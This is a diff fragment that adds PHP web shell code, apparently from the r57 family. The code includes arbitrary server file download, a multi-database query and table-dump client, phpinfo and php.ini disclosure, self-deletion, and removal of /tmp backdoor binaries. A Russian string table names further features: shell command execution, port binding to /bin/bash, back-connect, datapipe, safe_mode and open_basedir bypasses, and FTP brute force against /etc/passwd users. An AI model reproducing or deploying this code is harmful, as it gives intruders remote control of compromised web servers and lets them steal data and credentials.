+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     	$filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     	$mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";	
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';	
+ var $base = '';	
+ var $db   = '';	
+ var $connection;
+ var $res;        
+ var $error;      
+ var $rows;       
+ var $columns;     
+ var $num_rows;   
+ var $num_fields; 
+ var $dump;       
+ 
+ function connect()
+  {	   
+  	switch($this->db)
+     {
+  	 case 'MySQL': 	
+  	  if(empty($this->port)) { $this->port = '3306'; }
+  	  if(!function_exists('mysql_connect')) return 0;
+  	  $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);	
+  	  if(is_resource($this->connection)) return 1;
+  	 break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+  	  if(!function_exists('mssql_connect')) return 0;
+  	  $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);	
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;   
+  }
+  
+ function select_db()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 if(@mysql_select_db($this->base,$this->connection)) return 1;	
+    break;
+    case 'MSSQL':
+  	 if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;  
+  }
+  
+ function query($query)
+  { 
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  	case 'MySQL': 	
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
+      { 
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  	break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection))) 
+      {
+      $this->error = 'Query error';
+      return 0;	
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;     
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2; 
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';	
+      }
+     else 
+      { 
+      if(@ociexecute($this->res)) 
+       {	
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;	
+       }
+      $error = @ocierror();
+      $this->error=$error['message']; 
+      }
+    break;
+    }	
+  return 0;
+  }
+ function get_result()
+  { 
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;	
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->num_rows=@mysql_num_rows($this->res);
+  	 $this->num_fields=@mysql_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); 
+  	 @mysql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+  	 $this->num_rows=@mssql_num_rows($this->res);
+  	 $this->num_fields=@mssql_num_fields($this->res);    
+  	 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+  	 @mssql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+  	 $this->num_rows=@pg_num_rows($this->res); 
+  	 $this->num_fields=@pg_num_fields($this->res);   
+  	 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+  	 @pg_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0; 	
+  }
+ function dump($table)
+  { 
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->dump[0] = '## MySQL dump';
+  	 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+  	 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}	
+  	  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} 	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  } 	
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction'; 
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1; 	
+  }
+ function close()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL': 
+  	 @mysql_close($this->connection); 	
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }	
+  }
+ function affected_rows()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 return @mysql_affected_rows($this->res); 	
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }	
+  }
+ } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }		
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];	
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#e4e0d8>';
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else 
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";	
+   else
+    {
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5)
+      {	
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;	
+       case '1': 
+       if($sql->get_result())
+        {
+       	echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       	$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>"; 
+        }
+       break;	
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); 
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;	 	
+       }	
+      }
+     }
+    }
+   }   
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }	
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
+'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåğâåğå',
+'ru_text3' =>'Âûïîëíèòü êîìàíäó',
+'ru_text4' =>'Ğàáî÷àÿ äèğåêòîğèÿ',
+'ru_text5' =>'Çàãğóçêà ôàéëîâ íà ñåğâåğ',
+'ru_text6' =>'Ëîêàëüíûé ôàéë',
+'ru_text7' =>'Àëèàñû',
+'ru_text8' =>'Âûáåğèòå àëèàñ',
+'ru_butt1' =>'Âûïîëíèòü',
+'ru_butt2' =>'Çàãğóçèòü',
+'ru_text9' =>'Îòêğûòèå ïîğòà è ïğèâÿçêà åãî ê /bin/bash',
+'ru_text10'=>'Îòêğûòü ïîğò',
+'ru_text11'=>'Ïàğîëü äëÿ äîñòóïà',
+'ru_butt3' =>'Îòêğûòü',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-àäğåñ',
+'ru_text14'=>'Ïîğò',
+'ru_butt4' =>'Âûïîëíèòü',
+'ru_text15'=>'Çàãğóçêà ôàéëîâ ñ óäàëåííîãî ñåğâåğà',
+'ru_text16'=>'Èñïîëüçîâàòü',
+'ru_text17'=>'Óäàëåííûé ôàéë',
+'ru_text18'=>'Ëîêàëüíûé ôàéë',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'Èñïîëüçîâàòü',
+'ru_text21'=>'Íîâîå èìÿ',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Ëîêàëüíûé ïîğò',
+'ru_text24'=>'Óäàëåííûé õîñò',
+'ru_text25'=>'Óäàëåííûé ïîğò',
+'ru_text26'=>'Èñïîëüçîâàòü',
+'ru_butt5' =>'Çàïóñòèòü',
+'ru_text28'=>'Ğàáîòà â safe_mode',
+'ru_text29'=>'Äîñòóï çàïğåùåí',
+'ru_butt6' =>'Ñìåíèòü',
+'ru_text30'=>'Ïğîñìîòğ ôàéëà',
+'ru_butt7' =>'Âûâåñòè',
+'ru_text31'=>'Ôàéë íå íàéäåí',
+'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
+'ru_text33'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé open_basedir ÷åğåç ôóíêöèè cURL',
+'ru_butt8' =>'Ïğîâåğèòü',
+'ru_text34'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode ÷åğåç ôóíêöèş include',
+'ru_text35'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode ÷åğåç çàãğóçêó ôàéëà â mysql',
+'ru_text36'=>'Áàçà . Òàáëèöà',
+'ru_text37'=>'Ëîãèí',
+'ru_text38'=>'Ïàğîëü',
+'ru_text39'=>'Áàçà',
+'ru_text40'=>'Äàìï òàáëèöû áàçû äàííûõ',
+'ru_butt9' =>'Äàìï',
+'ru_text41'=>'Ñîõğàíèòü â ôàéëå',
+'ru_text42'=>'Ğåäàêòèğîâàíèå ôàéëà',
+'ru_text43'=>'Ğåäàêòèğîâàòü ôàéë',
+'ru_butt10'=>'Ñîõğàíèòü',
+'ru_butt11'=>'Ğåäàêòèğîâàòü',
+'ru_text44'=>'Ğåäàêòèğîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
+'ru_text45'=>'Ôàéë ñîõğàíåí',
+'ru_text46'=>'Ïğîñìîòğ phpinfo()',
+'ru_text47'=>'Ïğîñìîòğ íàñòğîåê php.ini',
+'ru_text48'=>'Óäàëåíèå âğåìåííûõ ôàéëîâ',
+'ru_text49'=>'Óäàëåíèå ñêğèïòà ñ ñåğâåğà',
+'ru_text50'=>'Èíôîğìàöèÿ î ïğîöåññîğå',
+'ru_text51'=>'Èíôîğìàöèÿ î ïàìÿòè',
+'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text53'=>'Èñêàòü â ïàïêå',
+'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
+'ru_butt12'=>'Íàéòè',
+'ru_text55'=>'Òîëüêî â ôàéëàõ',
+'ru_text56'=>'Íè÷åãî íå íàéäåíî',
+'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèğåêòîğèş',
+'ru_text58'=>'Èìÿ',
+'ru_text59'=>'Ôàéë',
+'ru_text60'=>'Äèğåêòîğèş',
+'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
+'ru_text61'=>'Ôàéë ñîçäàí',
+'ru_text62'=>'Äèğåêòîğèÿ ñîçäàíà',
+'ru_text63'=>'Ôàéë óäàëåí',
+'ru_text64'=>'Äèğåêòîğèÿ óäàëåíà',
+'ru_text65'=>'Ñîçäàòü',
+'ru_text66'=>'Óäàëèòü',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Êîìàíäà',
+'ru_text69'=>'Ïàğàìåòğ1',
+'ru_text70'=>'Ïàğàìåòğ2',
+'ru_text71'=>"Âòîğîé ïàğàìåòğ êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãğóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåğè÷íîì ïğåäñòàâëåíèè (íàïğèìåğ 0777)",
+'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text73'=>'Èñêàòü â ïàïêå',
+'ru_text74'=>'Èñêàòü â ôàéëàõ',
+'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ğåãóëÿğíîå âûğàæåíèå',
+'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüş óòèëèòû find',
+'ru_text80'=>'Òèï',
+'ru_text81'=>'Ñåòü',
+'ru_text82'=>'Áàçû äàííûõ',
+'ru_text83'=>'Âûïîëíåíèå SQL çàïğîñà',
+'ru_text84'=>'SQL çàïğîñ',
+'ru_text85'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode ÷åğåç âûïîëíåíèå êîìàíä â MSSQL ñåğâåğå',
+'ru_text86'=>'Ñêà÷èâàíèå ôàéëà ñ ñåğâåğà',
+'ru_butt14'=>'Ñêà÷àòü',
+'ru_text87'=>'Ñêà÷èâàíèå ôàéëîâ ñ óäàëåííîãî ftp-ñåğâåğà',
+'ru_text88'=>'FTP-ñåğâåğ:ïîğò',
+'ru_text89'=>'Ôàéë íà ftp ñåğâåğå',
+'ru_text90'=>'Ğåæèì ïåğåäà÷è',
+'ru_text91'=>'Àğõèâèğîâàòü â',
+'ru_text92'=>'áåç àğõèâàöèè',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-áğóòôîğñ',
+'ru_text95'=>'Ñïèñîê ïîëüçîâàòåëåé',
+'ru_text96'=>'Íå óäàëîñü ïîëó÷èòü ñïèñîê ïîëüçîâàòåëåé',
+'ru_text97'=>'Ïğîâåğåíî êîìáèíàöèé: ',
+'ru_text98'=>'Óäà÷íûõ ïîäêëş÷åíèé: ',
+'ru_text99'=>'* â êà÷åñòâå ëîãèíà è ïàğîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâàòåëÿ èç /etc/passwd',
+'ru_text100'=>'Îòïğàâêà ôàéëîâ íà óäàëåííûé ôòï ñåğâåğ',
+'ru_text101'=>'Èñïîëüçîâàòü òàêæå ïåğåâåğíóòîå (user -> resu) èìÿ ïîëüçîâàòåëÿ â êà÷åñòâå ïàğîëÿ',
+'ru_text102'=>'Ïî÷òà',
+'ru_text103'=>'Îòïğàâêà ïèñüìà',
+'ru_text104'=>'Îòïğàâêà ôàéëà íà ïî÷òîâûé ÿùèê',
+'ru_text105'=>'Êîìó',
+'ru_text106'=>'Îò',
+'ru_text107'=>'Òåìà',
+'ru_butt15'=>'Îòïğàâèòü',
+'ru_text108'=>'Òåêñò ïèñüìà',
+'ru_text109'=>'Ñâåğíóòü',
+'ru_text110'=>'Ğàçâåğíóòü',
+'ru_text111'=>'SQL-Ñåğâåğ : ïîğò',
+'ru_text112'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode ÷åğåç èñïîëüçîâàíèå ôóíêöèè mb_send_mail',
+'ru_text113'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode, ïğîñìîòğ ëèñòèíãà äèğåêòîğèé ñ èñïîëüçîâàíèåì imap_list',
+'ru_text114'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode, ïğîñìîòğ ñîäåğæèìîãî ôàéëà ñ èñïîëüçîâàíèåì imap_body',
+'ru_text115'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode, êîïèğîâàíèå ôàéëîâ ñ compress.zlib:// â copy()',
+'ru_text116'=>'Êîïèğîâàòü ôàéë',
+'ru_text117'=>'â',
+'ru_text118'=>'Ôàéë ñêîïèğîâàí',
+'ru_text119'=>'Íå óäàëîñü ñêîïèğîâàòü ôàéë',
+'ru_err0'=>'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë ',
+'ru_err1'=>'Îøèáêà! Íå ìîãó ïğî÷èòàòü ôàéë ',
+'ru_err2'=>'Îøèáêà! Íå óäàëîñü ñîçäàòü ',
+'ru_err3'=>'Îøèáêà! Íå óäàëîñü ïîäêëş÷èòüñÿ ê ftp ñåğâåğó',
+'ru_err4'=>'Îøèáêà àâòîğèçàöèè íà ftp ñåğâåğå',
+'ru_err5'=>'Îøèáêà! Íå óäàëîñü ïîìåíÿòü äèğåêòîğèş íà ftp ñåğâåğå',
+'ru_err6'=>'Îøèáêà! Íå óäàëîñü îòïğàâèòü ïèñüìî',
